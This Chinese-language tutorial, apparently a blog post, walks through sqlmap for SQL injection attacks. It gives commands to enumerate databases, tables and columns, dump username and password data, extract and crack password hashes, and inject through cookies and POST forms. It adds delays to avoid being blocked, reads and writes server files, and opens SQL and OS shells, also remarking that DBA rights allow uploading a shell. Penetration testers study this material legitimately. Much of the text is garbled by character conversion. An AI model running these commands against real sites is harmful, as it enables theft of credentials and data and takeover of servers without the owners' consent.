sqlmap简单流程使用

-u “(url)” php

一、判断可注入的参数 二、判断能够用那种SQL注入技术来注入 三、识别出哪一种数据库 四、根据用户选择,读取哪些数据

sqlmap支持五种不一样的注入模式:python

一、基于布尔的盲注,便可以根据返回页面判断条件真假的注入。 二、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增长)来判断。 三、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 四、联合查询注入,可使用union的状况下的注入。 五、堆查询注入,能够同时执行多条语句的执行时的注入。若是支持注入,sqlmap会显示存在什么样的注入类型若是知道什么卡类型数据库能够指定--dbms=mysql oracle mssql等而后查看一下是不是DBA sqlmap -u "url" --is-dba若是是dba权限比较大咱们能够执行一些命令或者上传一下shell。看一下用户名sqlmap -u "url" --current-user查看一下都有什么数据库sqlmap -u "url" --dbs若是权限很大能够跨库查询查看一下当前使用的数据库sqlmap -u "url" --current-db查看一下这个数据库的表名sqlmap -u "url" -D datebase --tables保存用户名密码的表名多是admin password user admin_user system manage member等查看一下列名sqlmap -u "url" -D datebase -T table --columns查看一下数据sqlmap -u "url" -D datebase -T table -C username,password --dump上面为简单使用咱们能够查看一下数据库都有什么用户sqlmap -u "url" --users能够查看当前数据库用户的密码sqlmap -u "url" --passwords能够选择保存hashes数据用外部程序爆破密码或者选择自带字典或者别的目录的字典用sqlmap来爆破密码能够查看一下用户的权限(可以执行什么命令)sqlmap -u "url" --privileges查看一下数据库的架构sqlmap -u "url" --schema --batch --exclude-sysdbs-v 显示调试信息 7个级别0 只显示python错误以及严重的信息1 同时显示基本信息和警告信息 (默认)2 同时显示debug信息3 同时显示payload4 同时显示http请求5 同时显示http响应头信息6 同时显示http相应页面测试语句能够在xml\payloads.xml中找到能够研究一下-m 制定url列表文件参数 --common-tables 当时用--tables没法获取数据库表时,可使用此参数适用于下列状况mysql版本低于5.0没有information_schema表数据库是microsoft Access 系统表MSysObjects是不可读的(默认)当前用户没有权限读取系统中保存数据结构的表的权限。暴力破解的表在/txt/common-tables.txt中,能够本身添加--common-columns 同上 用于列名cookie 注入sqlmap -u"cookie.sql.com/test.php" --cookie "id=11" --level 2 url中参数加在cookie参数后面 level最少指定2HTTP Cookie在level为2的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试。post表单sqlmap -u "url" --formsqlmap -u "url" --date "username=123&password=123" (hackbar获取)请求延迟 请求过快可能被封--delay=5文件操做读写--file-read=""--file-write=""命令执行sql--sql-query="语句"--sql-shell 返回一个shell系统命令执行--os-cmd--os-shell--tamper 加载脚本
相关文章
相关标签/搜索